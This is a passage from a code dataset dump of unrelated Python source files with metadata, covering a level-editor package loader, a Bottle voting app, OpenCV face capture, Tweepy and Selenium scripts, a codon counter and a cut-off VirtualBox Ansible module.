OBJ_TYPES[obj.name]\n except KeyError:\n LOGGER.warning('Unknown object type \"{}\" with ID \"{}\"!', obj.real_name, obj['id', ''])\n continue\n try:\n obj_id = obj['id']\n except LookupError:\n raise ValueError('No ID for \"{}\" object type in \"{}\" package!'.format(obj_type, pack.id)) from None\n if obj_id in all_obj[obj_type]:\n if obj_type.allow_mult:\n # Pretend this is an override\n obj_override[obj_type][obj_id].append(\n ParseData(pack.fsys, obj_id, obj, pack.id, True)\n )\n # Don't continue to parse and overwrite\n continue\n else:\n raise Exception('ERROR! \"' + obj_id + '\" defined twice!')\n all_obj[obj_type][obj_id] = ObjData(\n pack.fsys,\n obj,\n pack.id,\n pack.disp_name,\n )\n\n for template in pack.fsys.walk_folder('templates'):\n if template.path.casefold().endswith('.vmf'):\n template_brush.parse_template(pack.id, template)\n\n\nclass Package:\n \"\"\"Represents a package.\"\"\"\n def __init__(\n self,\n pak_id: str,\n filesystem: FileSystem,\n info: Property,\n name: str,\n ) -> None:\n disp_name = info['Name', None]\n if disp_name is None:\n LOGGER.warning('Warning: {id} has no display name!', id=pak_id)\n disp_name = pak_id.lower()\n\n self.id = pak_id\n self.fsys = filesystem\n self.info = info\n self.name = name\n self.disp_name = disp_name\n self.desc = info['desc', '']\n\n @property\n def enabled(self) -> bool:\n \"\"\"Should this package be loaded?\"\"\"\n if self.id == CLEAN_PACKAGE:\n # The clean style package is special!\n # It must be present.\n return True\n\n return PACK_CONFIG.get_bool(self.id, 'Enabled', default=True)\n\n @enabled.setter\n def enabled(self, value: bool) -> None:\n \"\"\"Enable or disable the package.\"\"\"\n if self.id == CLEAN_PACKAGE:\n raise ValueError('The Clean Style package cannot be disabled!')\n\n PACK_CONFIG[self.id]['Enabled'] = srctools.bool_as_int(value)\n\n def is_stale(self, mod_time: int) -> bool:\n \"\"\"Check to see if this package has been modified since the last run.\"\"\"\n if isinstance(self.fsys, RawFileSystem):\n # unzipped packages are for development, so always extract.\n LOGGER.info('Need to extract resources - {} is unzipped!', self.id)\n return True\n\n zip_modtime = int(os.stat(self.name).st_mtime)\n\n # If zero, it's never extracted...\n if zip_modtime != mod_time or mod_time == 0:\n LOGGER.info('Need to extract resources - {} is stale!', self.id)\n return True\n return False\n\n def get_modtime(self) -> int:\n \"\"\"After the cache has been extracted, set the modification dates\n in the config.\"\"\"\n if isinstance(self.fsys, RawFileSystem):\n # No modification time\n return 0\n else:\n return int(os.stat(self.name).st_mtime)\n\n\nclass Style(PakObject):\n \"\"\"Represents a style, specifying the era a test was built in.\"\"\"\n def __init__(\n self,\n style_id: str,\n selitem_data: SelitemData,\n items: list[EditorItem],\n renderables: dict[RenderableType, Renderable],\n config=None,\n base_style: Optional[str]=None,\n suggested: tuple[str, str, str, str]=None,\n has_video: bool=True,\n vpk_name: str='',\n corridors: dict[tuple[str, int], CorrDesc]=None,\n ) -> None:\n self.id = style_id\n self.selitem_data = selitem_data\n self.items = items\n self.renderables = renderables\n self.base_style = base_style\n # Set by post_parse() after all objects are read.\n # this is a list of this style, plus parents in order.\n self.bases: list[Style] = []\n self.suggested = suggested or ('', '', 'SKY_BLACK', '')\n self.has_video = has_video\n self.vpk_name = vpk_name\n self.corridors: dict[tuple[str, int], CorrDesc] = {}\n\n for group, length in CORRIDOR_COUNTS.items():\n for i in range(1, length + 1):\n try:\n self.corridors[group, i] = corridors[group, i]\n except KeyError:\n self.corridors[group, i] = CorrDesc()\n\n if config is None:\n self.config = Property(None, [])\n else:\n self.config = config\n\n set_cond_source(self.config, 'Style <{}>'.format(style_id))\n\n @classmethod\n def parse(cls, data: ParseData):\n \"\"\"Parse a style definition.\"\"\"\n info = data.info\n selitem_data = SelitemData.parse(info, data.pak_id)\n base = info['base', '']\n has_video = srctools.conv_bool(\n info['has_video', ''],\n not data.is_override, # Assume no video for override\n )\n vpk_name = info['vpk_name', ''].casefold()\n\n sugg = info.find_key('suggested', [])\n if data.is_override:\n # For overrides, we default to no suggestion..\n sugg = (\n sugg['quote', ''],\n sugg['music', ''],\n sugg['skybox', ''],\n sugg['elev', ''],\n )\n else:\n sugg = (\n sugg['quote', ''],\n sugg['music', ''],\n sugg['skybox', 'SKY_BLACK'],\n sugg['elev', ''],\n )\n\n corr_conf = info.find_key('corridors', [])\n corridors = {}\n\n icon_folder = corr_conf['icon_folder', '']\n\n for group, length in CORRIDOR_COUNTS.items():\n group_prop = corr_conf.find_key(group, [])\n for i in range(1, length + 1):\n prop = group_prop.find_key(str(i), '') # type: Property\n\n if icon_folder:\n icon = utils.PackagePath(data.pak_id, 'corr/{}/{}/{}.jpg'.format(icon_folder, group, i))\n else:\n icon = img.PATH_BLANK\n\n if prop.has_children():\n corridors[group, i] = CorrDesc(\n name=prop['name', ''],\n icon=prop['icon', icon],\n desc=prop['Desc', ''],\n )\n else:\n corridors[group, i] = CorrDesc(\n name=prop.value,\n icon=icon,\n desc='',\n )\n\n if base == '':\n base = None\n try:\n folder = 'styles/' + info['folder']\n except IndexError:\n # It's OK for override styles to be missing their 'folder'\n # value.\n if data.is_override:\n items = []\n renderables = {}\n vbsp = None\n else:\n raise ValueError(f'Style \"{data.id}\" missing configuration folder!')\n else:\n with data.fsys:\n with data.fsys[folder + '/items.txt'].open_str() as f:\n items, renderables = EditorItem.parse(f)\n try:\n vbsp = data.fsys.read_prop(folder + '/vbsp_config.cfg')\n except FileNotFoundError:\n vbsp = None\n\n return cls(\n style_id=data.id,\n selitem_data=selitem_data,\n items=items,\n renderables=renderables,\n config=vbsp,\n base_style=base,\n suggested=sugg,\n has_video=has_video,\n corridors=corridors,\n vpk_name=vpk_name,\n )\n\n def add_over(self, override: Style) -> None:\n \"\"\"Add the additional commands to ourselves.\"\"\"\n self.items.extend(override.items)\n self.renderables.update(override.renderables)\n self.config += override.config\n self.selitem_data += override.selitem_data\n\n self.has_video = self.has_video or override.has_video\n # If overrides have suggested IDs, use those. Unset values = ''.\n self.suggested = tuple(\n over_sugg or self_sugg\n for self_sugg, over_sugg in\n zip(self.suggested, override.suggested)\n )\n\n @classmethod\n def post_parse(cls) -> None:\n \"\"\"Assign the bases lists for all styles.\"\"\"\n all_styles: dict[str, Style] = {}\n\n for style in cls.all():\n all_styles[style.id] = style\n\n for style in all_styles.values():\n base = []\n b_style = style\n while b_style is not None:\n # Recursively find all the base styles for this one\n if b_style in base:\n # Already hit this!\n raise Exception('Loop in bases for \"{}\"!'.format(b_style.id))\n base.append(b_style)\n b_style = all_styles.get(b_style.base_style, None)\n # Just append the style.base_style to the list,\n # until the style with that ID isn't found anymore.\n style.bases = base\n\n def __repr__(self) -> str:\n return f''\n\n def export(self) -> tuple[list[EditorItem], dict[RenderableType, Renderable], Property]:\n \"\"\"Export this style, returning the vbsp_config and editoritems.\n\n This is a special case, since styles should go first in the lists.\n \"\"\"\n vbsp_config = Property(None, [])\n vbsp_config += self.config.copy()\n\n return self.items, self.renderables, vbsp_config\n\n\ndef desc_parse(\n info: Property,\n desc_id: str,\n pak_id: str,\n *,\n prop_name: str='description',\n) -> tkMarkdown.MarkdownData:\n \"\"\"Parse the description blocks, to create data which matches richTextBox.\n\n \"\"\"\n has_warning = False\n lines = []\n for prop in info.find_all(prop_name):\n if prop.has_children():\n for line in prop:\n if line.name and not has_warning:\n LOGGER.warning('Old desc format: {}', desc_id)\n has_warning = True\n lines.append(line.value)\n else:\n lines.append(prop.value)\n\n return tkMarkdown.convert('\\n'.join(lines), pak_id)\n\n\ndef sep_values(string: str, delimiters: Iterable[str] = ',;/') -> list[str]:\n \"\"\"Split a string by a delimiter, and then strip whitespace.\n\n Multiple delimiter characters can be passed.\n \"\"\"\n delim, *extra_del = delimiters\n if string == '':\n return []\n\n for extra in extra_del:\n string = string.replace(extra, delim)\n\n vals = string.split(delim)\n return [\n stripped for stripped in\n (val.strip() for val in vals)\n if stripped\n ]\n\n\n# Load all the package object classes, registering them in the process.\nfrom packages.item import Item, assign_styled_items\nfrom packages.stylevar import StyleVar\nfrom packages.elevator import Elevator\nfrom packages.editor_sound import EditorSound\nfrom packages.style_vpk import StyleVPK\nfrom packages.signage import Signage\nfrom packages.skybox import Skybox\nfrom packages.music import Music\nfrom packages.quote_pack import QuotePack\nfrom packages.pack_list import PackList\n","sub_path":"src/packages/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":32565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"46453899","text":"# -*- coding: utf-8 -*-\n\nfrom bottle import route, run, template, request, redirect, debug, static_file, TEMPLATE_PATH, abort\nfrom pymongo import MongoClient\nfrom bson.objectid import ObjectId\n\nconnection = MongoClient('localhost', 27017)\ndb = connection.espumalab\nTEMPLATE_PATH.append('espuma/templates/')\n\n@route('/static/', method=\"GET\")\ndef server_static(filename):\n filetype = filename.split('.')\n filetype = filetype[len(filetype) - 1]\n if filetype == 'css':\n return static_file(filename, root='espuma/static/css')\n elif filetype == 'js':\n return static_file(filename, root='espuma/static/js')\n elif filetype == 'png':\n return static_file(filename, root='espuma/static/img')\n else:\n abort(404, 'File not found')\n\n\n@route('/')\ndef index():\n total = 0\n objdb = db.projects.find()\n projects = [project for project in objdb]\n for project in projects: total += project['votes']\n return template('index', projects=projects, total=total)\n\n@route('/vote', method=\"POST\")\ndef vote():\n project_id = request.forms.get('project')\n db.projects.update( { '_id': ObjectId(project_id) }, { '$inc': { 'votes': 1 } } )\n redirect('/')\n\ndebug(True)\nrun(host='localhost', port='8080', reloader=True)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"188042920","text":"import numpy as np\nimport scipy, scipy.optimize\nimport plots\n\nnreal = 1000\ntmax = 200\nwalk=2*(np.random.random_integers(0, 1, (nreal,200))-0.5)\ncumwalk = np.cumsum(walk, axis=1)\nsq_distance = cumwalk**2\nmean_distance = np.sqrt(np.mean(sq_distance, axis=0))\naxes([0.18,0.18,0.75,0.75])\nplot(mean_distance, lw=2, label='distance moyenne')\n\ndef f(A, y, x):\n err = y - A*np.sqrt(x)\n return err\n\nt = np.arange(tmax)\ncoeff = scipy.optimize.leastsq(f, 0.8, args=(mean_distance, t))\nplot(t, coeff[0]*np.sqrt(t), lw=2, label='fit en $\\sqrt{t}$')\nxlabel('$t$', fontsize=30)\nylabel('$d(t)$', fontsize=30)\nlegend(loc='3')\n\npylab.rcParams.update({'xtick.labelsize': 20})\npylab.rcParams.update({'ytick.labelsize': 20})\nfigure(figsize=(12,6))\naxes([0.1,0.15,0.38,0.75])\nplot(mean_distance**2, lw=2)\nxlabel('$t$', fontsize=20)\nylabel('$d^2(t)$', fontsize=20)\nylim(0, 220)\naxes([0.57,0.15,0.38,0.75])\nplot(mean_distance, lw=2)\nxlabel('$t$', fontsize=22)\nylabel('$d(t)$', fontsize=22)\nylim(0, 15)\n","sub_path":"course_in_french/source/diffusion.py","file_name":"diffusion.py","file_ext":"py","file_size_in_byte":985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"237191653","text":"import cv2\n\nclassificador = cv2.CascadeClassifier(\"haarcascade-frontalface-default.xml\") #Vai carregar o xml HaarCascade. É o Treinamento para Detecção de faces.\nclassificadorOlho = cv2.CascadeClassifier(\"haarcascade-eye.xml\")\ncamera = cv2.VideoCapture(0) #Vai fazer a captura da imagem da web-can (0) Indica a própria web-Can do notebook\namostra = 1 #Controla quantas fotos foi tiradas\nnumeroAmostras = 25\nid = input('Digite seu identificador: ')\nlargura, altura = 220, 220 #tamanho da imagem\nprint(\"Capturando as Faces... \")\n\n\nwhile(True):\n conectado, imagem = camera.read() #Realiza a leitura da Web-can\n imagemCinza = cv2.cvtColor(imagem, cv2.COLOR_BGR2GRAY) #Converte a imagem da web-Can em escala de cinza\n facesDetectadas = classificador.detectMultiScale(imagemCinza, #Vai detectar as faces \"detectmultiscale\" da imagem web-can\n scaleFactor= 1.5, #Indica a escala da imagem\n minSize= (150,150)) #Tamanho mínimo para fazer a detecção de faces\n\n for(x, y, l, a) in facesDetectadas: #Retangulo que imprime em volta das faces detectadas\n cv2.rectangle(imagem, (x, y), (x + l, y + a), (0,0,255), 2)\n # Ponto Inicial e final da face | Ponto final do quadrado | Valor RGB da cor do quadrado | borda do quadrado.\n\n regiao = imagem[y:y + a, x:x + l] #Está somente a face\n regiaoCinzaOlho = cv2.cvtColor(regiao, cv2.COLOR_BGR2GRAY)\n olhosDetectados = classificadorOlho.detectMultiScale(regiaoCinzaOlho)\n\n for (ox, oy, ol, oa) in olhosDetectados:\n cv2.rectangle(regiao, (ox, oy), (ox + ol, oy + oa), (0, 255,0), 2) #Cor em BGR\n\n\n if cv2.waitKey(1) & 0XFF == ord('q'): #Esperar a tecla Q\n imagemFace = cv2.resize(imagemCinza[y:y + a, x:x + l], (largura, altura)) #Redimensiona a imagem\n cv2.imwrite(\"fotos/pessoa.\" + str(id) + \".\" + str(amostra) + \".jpg\", imagemFace) #Gravando a imagem no diretório\n print(\"[foto \" + str(amostra) + \"capturada com sucesso]\")\n amostra +=1 #Incrementando o valor\n\n cv2.imshow(\"Face\", imagem) #Mostra a imagem capturada da Web-Can\n cv2.waitKey(1) #Aguardar o click de uma tecla\n\n if (amostra >= numeroAmostras +1):\n break\n\nprint(\"Todas as Faces foram capturadas com sucesso\")\ncamera.release()\ncv2.destroyAllWindows()\n\n\n\n","sub_path":"captura.py","file_name":"captura.py","file_ext":"py","file_size_in_byte":2395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"487828562","text":"import cv2 as cv\n\nimg = cv.imread('messi5.png')\nimgray = cv.cvtColor(img, cv.COLOR_BGR2GRAY)\nret, thresh = cv.threshold(imgray, 127, 255, 0)\ncontours, hierarchy = cv.findContours(thresh, cv.RETR_TREE, cv.CHAIN_APPROX_SIMPLE)\ncnt = contours[4]\ncv.drawContours(img, [cnt], 0, (0, 255, 0), 3)\n\n# 最小外圆\n(x, y), radius = cv.minEnclosingCircle(cnt)\ncenter = (int(x), int(y))\nradius = int(radius)\ncv.circle(img, center, radius, (0, 255, 0), 2)\n","sub_path":"4_OPENCV中的图像处理/4_9_OpenCV 中的轮廓.py","file_name":"4_9_OpenCV 中的轮廓.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"300739835","text":"import time\n\nfrom .check_alarm import check_alarm\nfrom .call_notification import call_notification\n\n##\n# manually_set_alarm\n#\ndef manually_set_alarm():\n '''\n @summary let the user manually set the alarm\n\n @desc When user continuously denies the alarms attempted to be set by Pylarm then the\n user will now have the option to set their own alarm in the format of\n \"MM DD YYYY HH:MM(am/pm)\" e.g. \"08 03 2019 10:45pm\"\n\n @author Brandon Benefield\n @since v1.0.0\n\n @param {void}\n @return {void}\n '''\n # have user manually set their alarm\n alarm_time = input('Manually set the alarm: MM DD YYYY HH:MM(am/pm)')\n # parse the alarm string into datetime tuple\n p_alarm_time = time.strptime(alarm_time, '%m %d %Y %I:%M%p')\n # parse datetime tuple into integer of seconds\n mk_time = time.mktime(p_alarm_time)\n # get time when alarm should go off\n seconds_until_alarm = int(mk_time * 1) - int(time.time() * 1)\n\n print(f'\\nThe alarm has been set and will go off at {time.ctime(mk_time)}\\n')\n check_alarm(seconds_until_alarm)\n call_notification()","sub_path":"src/helpers/manually_set_alarm.py","file_name":"manually_set_alarm.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"389001147","text":"class BotImpostor():\n x = 0\n y = 0\n w = 0\n h = 0\n speed = 2\n time = 0\n select = False\n after_kill_u = False\n dir_of_bot_impstor = None\n select_impostor = False\n dir_list = [\"LEFT\",\"RIGHT\",\"UP\",\"DOWN\"]\n skin = None\n\n xb = 0\n yb = 0\n wb = 0\n hb = 0\n\n def __init__(self, x, y, w, h, skin, xb, yb, wb, hb):\n self.x = x\n self.y = y\n self.w = w\n self.h = h\n self.skin = skin\n\n self.xb = xb\n self.yb = yb\n self.wb = wb\n self.hb = hb\n\n def show(self):\n image(self.skin, self.x, self.y, self.w, self.h)\n\n def show_to_hide_impostor(self):\n rect(self.xb, self.yb, self.wb, self.hb)\n fill(0,0,0)\n text('Press to hide The impostor', self.xb, self.yb, self.wb, self.hb)\n\n def press_to_hide_impostor(self):\n if mouseX > self.xb - self.wb/2 and mouseX < self.xb + self.wb/2 and mouseY > self.yb - self.hb/2 and mouseY < self.yb + self.hb/2:\n self.select_impostor = True\n\n def move(self):\n if (millis() - self.time) >= 1000:\n self.time = millis()\n self.dir_of_bot_impstor = self.dir_list[int(random(0,4))]\n\n if self.dir_of_bot_impstor == self.dir_list[0]:\n self.x = self.x - self.speed\n elif self.dir_of_bot_impstor == self.dir_list[1]:\n self.x = self.x + self.speed\n elif self.dir_of_bot_impstor == self.dir_list[2]:\n self.y = self.y - self.speed\n elif self.dir_of_bot_impstor == self.dir_list[3]:\n self.y = self.y + self.speed\n\n if self.x > width:\n self.dir_of_bot_impstor = self.dir_list[0]\n elif self.x < 0:\n self.dir_of_bot_impstor = self.dir_list[1]\n elif self.y > height:\n self.dir_of_bot_impstor = self.dir_list[2]\n elif self.y < 0:\n self.dir_of_bot_impstor = self.dir_list[3]\n\n def kill_player(self, list_of_rect):\n if self.x > list_of_rect[0]:\n self.x = self.x + self.speed\n elif self.x < list_of_rect[1]:\n self.x = self.x - self.speed\n elif self.y > list_of_rect[2]:\n self.y = self.y + self.speed\n elif self.x < list_of_rect[3]:\n self.y = self.y - self.speed\n\n def distance(self, player_x, player_y, player_w, player_h):\n dx = abs(player_x - self.x)\n dy = abs(player_y - self.y)\n if dx <= player_w/2+self.w/2 and dy <= player_h/2+self.h/2:\n self.select = True\n\n def kill_you(self):\n textSize(45)\n fill(0,0,0)\n text('YOU ARE DEAD', width/2, height/2-150)\n textSize(24)\n self.after_kill_u = True\n","sub_path":"bot_impostor.py","file_name":"bot_impostor.py","file_ext":"py","file_size_in_byte":2681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"453148478","text":"import json\nimport oauth2 as oauth\n\n\n\nAPI_KEY=''\n\nAPI_SECRET=''\n\nCONSUMER_KEY=''\n\nCONSUMER_SECRET=''\n\n\n#url = 'https://api.twitter.com/1.1/account/verify_credentials.json'\n\nconsumer = oauth.Consumer(key=CONSUMER_KEY, secret=CONSUMER_SECRET)\naccess_token = oauth.Token(key=API_KEY, secret=API_SECRET)\nclient = oauth.Client(consumer, access_token)\n\n#timeline_endpoint= \"https://api.twitter.com/1.1/statuses/home_timeline.json\"\n#tweetsearch = \"https://api.twitter.com/1.1/search/tweets.json?q=\"\n#response, data = client.request(timeline_endpoint)\n#response, searchin = client.request(tweetsearch)\n#\"https://api.twitter.com/1.1/search/tweets.json?q=nasa&result_type=popular\"\n\n#tweets = json.loads(data)\n#for tweet in tweets:\n# print(tweet['text'])\n\n\n\nin1 = input(\"For statuses on home timeline, type home: \")\n\nin2 = input(\"Please type what you'd like to search for - example nasa\")\n\nupin2 = \"{}&result_type=popular\".format(in2)\n\nsearch = \"https://api.twitter.com/1.1/search/tweets.json?q={}\".format(upin2)\n\n\n\nif in1 == \"home\":\n url_home = \"https://api.twitter.com/1.1/statuses/home_timeline.json\"\n print(url_home)\n\nsearch = \"https://api.twitter.com/1.1/search/tweets.json?q={}\".format(upin2)\n\n#url2_home = ] \"\"\n\nsearchtest = json.loads(searchin)\n#search = searchtest{ }\nfor key, value in searchtest.items():\n print(key, value)\n#for tweet in searchtest:\n# print(tweet['text'])\n","sub_path":"twt12.py","file_name":"twt12.py","file_ext":"py","file_size_in_byte":1387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"335927716","text":"import sys\nimport tweepy\nfrom tweetkeys import *\nfrom wand.image import Image\nimport platform\nimport os\n## for second version, because problems with Wand on OSX\n#from svglib.svglib import svg2rlg\n#from reportlab.graphics import renderPM\nimport subprocess # May want to use subprocess32 instead\n\n\nprint(\"invoking TWEEEEEETING\")\nprint(platform.system())\n\n# ## get ourselves the image we need (convert svg to jpg)\n# with Image(filename=sys.argv[2]) as img:\n# img.format = 'jpeg'\n# img.save(filename='out.jpg')\n\n\n# pi = tweepy.API(auth) \n# tweet = sys.argv[1] # some text + \n# image_path = \"tmp/out2.jpg\" # jpg created above or in plotrender.py\n# print(image_path)\n# # to attach the media file \n# #status = \n# api.update_with_media(image_path, tweet) \n# # api.update_status(status = tweet) \n\n##### using wand on OSX renders erroneously, \n\n# def convertSVGtoTweet(svg, tweettext):\n# with Image(filename=svg) as img:\n# img.format = 'jpeg'\n# img.save(filename='tweet.jpg')\n# # authentication \n# auth = tweepy.OAuthHandler(consumer_key, consumer_secret) \n# auth.set_access_token(access_token, access_token_secret) \n# api = tweepy.API(auth) \n# tweet = tweettext\n# image_path = \"tweet.jpg\" # jpg created above\n# print(image_path, tweet)\n# # to attach the medicd /Ap a file \n# #status = \n# api.update_with_media(image_path, tweet) \n# # api.update_status(status = tweet) \n\n\n\n\ndef TweetImgTxt(image_path, tweettext):\n\n auth = tweepy.OAuthHandler(consumer_key, consumer_secret) \n auth.set_access_token(access_token, access_token_secret) \n api = tweepy.API(auth) \n print (dir(api))\n tweet = tweettext\n # image_path = \"tweet.png\" # png created above\n print(image_path, tweet)\n # to attach the media file \n #status = \n\n ## deprecated method\n #api.update_with_media(image_path, tweet) \n # api.update_status(status = tweet) \n ## new method\n file=open(image_path, 'rb')\n media_id = api.media_upload(filename=image_path, file=file)\n # api.update_with_updatemedia(file, tweet) \n # api.update_status(status = tweet) \n\n print(media_id)\n #https://docs.tweepy.org/en/v4.0.0/api.html#tweepy.API.simple_upload\n api.update_status(tweet, media_ids=[media_id.media_id_string])\n #https://stackoverflow.com/questions/37050450/tweepy-python-library-media-ids-parameter-is-invalid-and-tweet-must-not-have\n \ndef convertSVGtoTweet(svg, tweettext):\n print(svg)\n pltfrm = platform.system()\n if (pltfrm == 'Darwin'):\n cmd_list = [ '/Applications/Inkscape.app/Contents/MacOS/inkscape','--export-filename=tweet.png', svg ]\n p = subprocess.Popen( cmd_list, stdout=subprocess.PIPE, stderr=subprocess.PIPE )\n out, err = p.communicate()\n if p.returncode:\n raise Exception( 'Inkscape error: ' + (err or '?') )\n else:\n # cmd_list = [ '/usr/bin/inkscape','--export-filename=tweet.png', svg ]\n with Image(filename=svg) as img:\n img.format = 'png'\n img.save(filename='tweet.png')\n auth = tweepy.OAuthHandler(consumer_key, consumer_secret) \n auth.set_access_token(access_token, access_token_secret) \n api = tweepy.API(auth) \n tweet = tweettext\n image_path = \"tweet.png\" # png created above\n print(image_path, tweet)\n # to attach the media file \n #status = \n\n ## deprecated method\n #api.update_with_media(image_path, tweet) \n # api.update_status(status = tweet) \n ## new method\n file=open(image_path, 'rb')\n media_id = api.media_upload(filename=image_path, file=file)\n\n # media_id = api.simple_upload(filename=image_path, file=file)\n print(media_id)\n #https://docs.tweepy.org/en/v4.0.0/api.html#tweepy.API.simple_upload\n api.update_status(tweet, media_ids=[media_id.media_id_string])\n #https://stackoverflow.com/questions/37050450/tweepy-python-library-media-ids-parameter-is-invalid-and-tweet-must-not-have\n \n ","sub_path":"lib/tweetplot.py","file_name":"tweetplot.py","file_ext":"py","file_size_in_byte":4011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"165383427","text":"from selenium import webdriver\nimport time\nimport json\n\ndriver = webdriver.Chrome(executable_path='chromedriver.exe')\ndriver.get('https://ngs.ru/text/')\n\narticles = driver.find_elements_by_css_selector('div:nth-child(3)>article')\nnews = []\nf = open('data.json', 'w')\n\nfor article in articles:\n link = article.find_element_by_tag_name('a').get_attribute('href')\n title = article.find_element_by_css_selector('div>div>h2>a>span').text\n news.append({'title' : title, 'link' : link, 'text' : None })\n\nfor n in news:\n print(n['link'])\n time.sleep(2)\njson.dump(news, f)\ndriver.close()","sub_path":"ngs.py","file_name":"ngs.py","file_ext":"py","file_size_in_byte":593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"371841964","text":"import csv\nimport numpy as np\nfrom scipy import stats\nimport sys\n\n# The purpose of this file is to go through a flat file containing\n# non-overlapping viral genes and to count the occurences of start and\n# stop codons in the gene's alternative reading frames.\n\n# Specify the name of the flat file containing the genes\nfilename = 'VirusGenes_Nonoverlapping_Controls_Complete.txt'\n\n# All counters are defined and set to 0\n\n# The first set of counters will keep track of the total number of\n# codons in the +1 and +2 frames\nPlusOneCodons = 0\nPlusTwoCodons = 0\n\n# The second set will keep track of the number of stop codons\n# that occur in the +1 and +2 frames, respectively\nPlusOneStops = 0\nPlusTwoStops = 0\n\n# The final set will keep track of the number of start codons that\n# occur in the +1 and +2 frames, respectively\nPlusOneStarts = 0\nPlusTwoStarts = 0\n\n\n\n# The flat file is opened using the csv module. The flat file should be\n# in tab-delimited format. If it's not, the delimiter can be changed\n# to match the format.\nwith open('%s'%filename, 'r') as f:\n reader = csv.reader(f, delimiter = '\\t')\n for row in reader:\n # The first element in the flat file is the database UID, followed by the\n # gene's nucleotide sequence.\n UID = row[0]\n Sequence_0 = row[1]\n # The nucleotide sequence length is found\n GeneLength = len(Sequence_0)\n # it is then used to artificially shift the sequence into its +1 frame.\n # The sequence is ended two nucleotides prematurely to make sure that the\n # sequence stays a multiple of 3 in length (the final two nucleotides don't\n # constitute a codon). The same procedure is used to shift the sequence\n # into its +2 frame, except it is truncated one nucleotide from the end instead\n # of two.\n Sequence_1 = Sequence_0[1:GeneLength-2]\n Sequence_2 = Sequence_0[2:GeneLength-1]\n\n # +1 Frame Counting block\n \n # The length of the sequence in its +1 frame is noted\n Length_1 = len(Sequence_1)\n # Then a list of indices is compiled ranging from 0 to the length of the sequence\n # using a step size of 3. This translates to a list of indices that correspond to\n # the first nucleotide in each codon in the sequence. \n Index_1 = range(0,len(Sequence_1),3)\n # Scanning the nucleotide sequence by running through the indices previously collected\n for n in Index_1:\n # m is defined to be n+3 so that Sequence[n:m] is the codon starting at index n\n m = n+3\n Codon = Sequence_1[n:m]\n # 1 is added to the total codon counter\n PlusOneCodons +=1\n # If the codon is a stop codon, it is counted by the relevant stop codon counter\n if Codon == 'TAA' or Codon == 'TAG' or Codon == 'TGA':\n PlusOneStops += 1\n # If the codon is a start codon, it is counted by the relevant start codon counter\n if Codon == 'ATG':\n PlusOneStarts += 1\n\n\n\n # +2 Frame Counting - this is the same as the previous block, except is for the gene\n # in its +2 reading frame\n Length_2 = len(Sequence_2)\n Index_2 = range(0,len(Sequence_2),3)\n for n in Index_2:\n m = n+3\n Codon = Sequence_2[n:m]\n PlusTwoCodons += 1\n if Codon == 'TAA' or Codon == 'TAG' or Codon == 'TGA':\n PlusTwoStops += 1\n if Codon == 'ATG':\n PlusTwoStarts += 1\n\n# The results are then printed for the user\nprint()\nprint('Plus One Frame:')\nprint('Total Number of Codons: %s' %PlusOneCodons)\nprint('Number of Start Codons: %s' %PlusOneStarts)\nprint('Percentage of Total: %.2f%%' %((PlusOneStarts/PlusOneCodons)*100))\nprint('1 in %d +1 Codons are Starts\\n' %(PlusOneCodons/PlusOneStarts))\nprint('Number of Stop Codons: %s' %PlusOneStops)\nprint('Percentage of Total: %.2f%%' %((PlusOneStops/PlusOneCodons)*100))\nprint('1 in %d +1 Codons are Stops\\n' %(PlusOneCodons/PlusOneStops))\n\nprint()\nprint('Plus Two Frame:')\nprint('Total Number of Codons: %s' %PlusTwoCodons)\nprint('Number of Start Codons: %s' %PlusTwoStarts)\nprint('Percentage of Total: %.2f%%' %((PlusTwoStarts/PlusTwoCodons)*100))\nprint('1 in %d +2 Codons are Starts\\n' %(PlusTwoCodons/PlusTwoStarts))\nprint('Number of Stop Codons: %s' %PlusTwoStops)\nprint('Percentage of Total: %.2f%%' %((PlusTwoStops/PlusTwoCodons)*100))\nprint('1 in %d +2 Codons are Stops\\n' %(PlusTwoCodons/PlusTwoStops))\n\n","sub_path":"Start_Stop_CodonCounter/StopStartCodonCounter.py","file_name":"StopStartCodonCounter.py","file_ext":"py","file_size_in_byte":4524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"348720616","text":"\nfrom ansible.module_utils.basic import AnsibleModule\nimport virtualbox\nfrom threading import Thread\nimport time\nimport subprocess\n#from virtualbox import LockType\n\nvbox=virtualbox.VirtualBox()\n\ndef create_machine(template,machine_name):\n template=vbox.find_machine(template)\n machine=template.clone(name=machine_name)\n return machine\n\ndef delete_machine(vm):\n vm.remove(delete=True)\n\ndef start_machine(vm,memory,nbcpu):\n if is_machine_stopped(vm):\n session=vm.create_session()\n session.machine.memory_size=memory\n session.machine.cpu_count=nbcpu\n session.machine.save_settings()\n session.unlock_machine()\n\n progress=vm.launch_vm_process(type_p='headless')\n #progress=vm.launch_vm_process(session,'headless','')\n\n\ndef stop_machine(vm):\n if not is_machine_stopped(vm):\n session=vm.create_session()\n session.console.power_down()\n\n\ndef get_machine(machine_name):\n for machine in vbox.machines:\n if machine.name==machine_name:\n return machine\n return None\n\n\ndef is_machine_stopped(machine):\n return (machine.state==1) or (machine.state==2) or (machine.state==3) or (machine.state==4)\n\n\ndef find_ip_using_arp(mac_address,timeout_in_s,network_range):\n ip=None\n stoptime=int(time.time())+int(timeout_in_s)\n firsttime=True\n while ip==None and int(time.time())/dev/null ; arp -n\" % network_range,shell=True).split('\\n')\n arpdict=dict()\n for 